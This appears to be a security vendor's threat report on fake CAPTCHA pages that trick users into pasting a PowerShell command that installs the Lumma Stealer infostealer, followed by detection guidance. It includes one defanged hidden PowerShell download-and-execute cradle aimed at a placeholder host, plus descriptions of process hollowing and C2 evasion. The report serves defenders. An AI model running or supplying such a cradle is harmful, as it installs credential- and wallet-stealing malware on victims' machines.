A new social engineering technique has emerged that represents a concerning evolution in malware delivery: fake CAPTCHA verification pages that trick users into executing malicious commands on their own machines. The SenseOn Threat Research Team has tracked multiple campaigns using this technique to deploy Lumma Stealer, a sophisticated information-stealing malware that targets credentials, cryptocurrency wallets, browser data, and sensitive files.
This technique is particularly dangerous because it bypasses many traditional security controls. The user, not an exploit, not a macro, not a vulnerability, is the execution mechanism. The malicious command runs with the user's own privileges, initiated by the user's own actions.
The Attack Chain
Stage 1: The Lure
Victims encounter the fake CAPTCHA through several vectors. The most common is malvertising, malicious advertisements served through legitimate advertising networks that redirect users through a chain of traffic distribution systems (TDS). Other vectors include compromised websites, SEO-poisoned search results, and phishing emails that link to the fake verification page.
The landing page presents a convincing CAPTCHA verification dialogue. It mimics the visual design of legitimate CAPTCHA providers such as Google reCAPTCHA or Cloudflare Turnstile, complete with familiar branding elements, the checkbox interface, and verification messaging such as "Verify you are human" or "Please complete the security check."
Stage 2: Clipboard Manipulation
When the user clicks the fake CAPTCHA checkbox, the page executes JavaScript that silently copies a malicious command to the user's clipboard. The user sees a seemingly innocuous verification step: a dialogue instructing them to "complete verification" by pressing Windows+R to open the Run dialogue, pressing Ctrl+V to paste, and pressing Enter to confirm.
The instructions are presented as a standard anti-bot verification step, often accompanied by reassuring visual elements like progress bars, loading animations, and success indicators that mimic legitimate CAPTCHA flows.
Stage 3: User-Initiated Execution
The command copied to the clipboard is typically a PowerShell one-liner disguised as a verification string. When the user pastes and executes it, the command:
- Launches PowerShell with execution policy bypass flags
- Downloads a payload from attacker-controlled infrastructure, often using legitimate hosting services (GitHub, Discord CDN, Cloudflare Workers) to evade URL reputation filtering
- Executes the downloaded payload, which unpacks and installs Lumma Stealer
A simplified example of the clipboard payload:
powershell -w hidden -ep bypass -c "IEX(IWR('hxxps://cdn[.]example[.]com/verify.txt').Content)"The actual commands observed in the wild use extensive obfuscation, including variable substitution, string reversal, base64 encoding within base64 encoding, and environment variable concatenation, to evade detection by security tools that inspect clipboard content or command-line arguments.
Stage 4: Lumma Stealer Deployment
The downloaded payload deploys Lumma Stealer through a multi-stage process designed to evade endpoint detection:
Process hollowing: The installer creates a legitimate Windows process (often RegAsm.exe, MSBuild.exe, or InstallUtil.exe) in a suspended state, replaces its memory contents with the Lumma Stealer payload, and resumes execution. This technique allows the malware to run under the guise of a trusted Microsoft binary.
Anti-analysis checks: Before executing its payload, Lumma Stealer checks for virtualised environments, debuggers, and security research tools. It queries system information (processor count, RAM size, disk size, recent file activity) to determine whether it is running in a sandbox.
Configuration decryption: Lumma Stealer's configuration, including C2 server addresses, targeted applications, and exfiltration parameters, is encrypted within the binary and decrypted at runtime using a key derived from system-specific values.
Lumma Stealer Capabilities
Lumma Stealer is a Malware-as-a-Service (MaaS) offering sold on underground forums and Telegram channels. Subscription prices range from approximately $250 to $1,000 per month depending on the tier, with higher tiers offering additional features such as custom builds, dedicated C2 infrastructure, and log processing services.
Its data theft capabilities are extensive:
Browser Data Harvesting
Lumma Stealer targets all major Chromium-based and Gecko-based browsers. It extracts saved passwords from browser credential stores, session cookies (enabling account takeover without knowing credentials), autofill data including payment card information, browsing history, and downloaded file records. It specifically targets cookies for high-value services including banking portals, email providers, social media platforms, and cloud services.
Cryptocurrency Wallet Theft
The stealer targets both browser extension wallets (MetaMask, Phantom, Coinbase Wallet, and over 30 others) and desktop wallet applications (Exodus, Atomic, Electrum, and similar). It extracts wallet files, private keys, and seed phrases, enabling direct theft of cryptocurrency assets.
Credential Store Extraction
Beyond browsers, Lumma Stealer harvests credentials from dedicated password managers, FTP clients (FileZilla, WinSCP), email clients (Outlook, Thunderbird), and VPN clients. It also extracts credentials from Windows Credential Manager and targets SSH keys stored in standard locations.
File Grabber
Configurable file grabbing functionality allows operators to specify file extensions, directories, and size limits for targeted file theft. Common targets include documents (PDF, DOCX, XLSX), key files (PEM, KEY, PFX), configuration files, and database files.
System Profiling
Lumma Stealer collects detailed system information including hardware identifiers, installed software inventories, running processes, network configuration, and screenshots. This information is packaged with stolen credentials and sold or used to help carry out further attacks.
Command-and-Control Communication
Lumma Stealer communicates with its C2 infrastructure using HTTPS POST requests to domains that rotate frequently. The C2 communication pattern includes:
Initial check-in: The stealer sends a POST request containing a unique bot identifier derived from hardware characteristics. The C2 server responds with the current configuration, including which data to target and where to exfiltrate.
Data exfiltration: Stolen data is compressed, encrypted, and exfiltrated via HTTPS POST requests. Large datasets are chunked into smaller uploads to avoid triggering data loss prevention (DLP) rules based on transfer size.
Domain rotation: C2 domains are registered in bulk and rotated frequently, often daily. Domains are typically registered through bulletproof hosting providers or using stolen identities. Some variants use domain generation algorithms (DGAs) to dynamically compute C2 addresses.
Dead drop resolvers: Recent variants use legitimate services (Steam profiles, Telegram channels, Pastebin) as dead drop resolvers; the stealer fetches the current C2 address from a profile page or channel description, providing resilience against domain takedowns.
Detection Opportunities
Despite the sophistication of this attack chain, multiple detection opportunities exist.
At the Social Engineering Stage
- Web content filtering: Block known fake CAPTCHA domains and pages that match the visual patterns used in these campaigns
- JavaScript analysis: Detect web pages that programmatically modify clipboard contents, particularly when the clipboard content contains PowerShell commands or encoded payloads
- User awareness: Train users to recognise that legitimate CAPTCHA systems never require opening the Run dialogue, executing commands, or interacting with system tools
At the Execution Stage
- PowerShell monitoring: Detect PowerShell execution initiated from the Windows Run dialogue (
explorer.exespawningpowershell.exe) with download cradle patterns or execution policy bypass flags - Command-line logging: Monitor for obfuscated PowerShell commands, particularly those containing
IEX,Invoke-Expression,Net.WebClient, or base64-encoded content - Clipboard monitoring: Detect clipboard contents that contain executable commands, particularly PowerShell or cmd.exe syntax
At the Installation Stage
- Process injection detection: Monitor for process hollowing indicators: legitimate Windows binaries exhibiting unexpected network connections, file access patterns, or memory characteristics
- Behavioural analysis: Detect the combination of process creation, memory manipulation, and network connection that characterises process hollowing
- File system monitoring: Alert on the creation of suspicious files in user-writable directories, particularly executables or DLLs in temporary folders
At the Data Theft Stage
- Credential store access: Monitor for processes accessing browser credential databases, cookie stores, and Windows Credential Manager outside of the expected browser processes
- Cryptocurrency wallet access: Detect non-wallet processes accessing wallet files, extension data, or seed phrase storage locations
- Data exfiltration patterns: Identify HTTPS POST requests to recently registered or low-reputation domains containing compressed or encrypted payloads
SenseOn's Detection Approach
SenseOn's unified platform provides detection coverage across every stage of this attack chain. The cross-domain correlation engine correlates endpoint telemetry (PowerShell execution, process hollowing, credential store access) with network telemetry (C2 communication, data exfiltration) to build a complete attack narrative.
Critically, SenseOn's behavioural baselines detect the anomalous pattern of activity that characterises Lumma Stealer deployment: a user's browser session leading to PowerShell execution, followed by process injection, credential access, and outbound data transfer, as a cohesive attack sequence rather than isolated indicators. This contextual detection provides high confidence and low false positive rates even for novel variants that modify individual indicators.
Recommendations
Organisations should take the following defensive measures:
- Restrict PowerShell execution where possible using constrained language mode and application control policies
- Deploy endpoint detection capable of monitoring PowerShell command-line arguments and process ancestry chains
- Conduct user awareness training specifically addressing the fake CAPTCHA technique. Emphasise that no legitimate verification process requires executing commands
- Monitor credential store access and alert on non-standard processes accessing browser password databases and cookie stores
- Implement network detection for C2 communication patterns, including connections to recently registered domains and dead drop resolver services
- Restrict clipboard access via browser security policies where operationally feasible
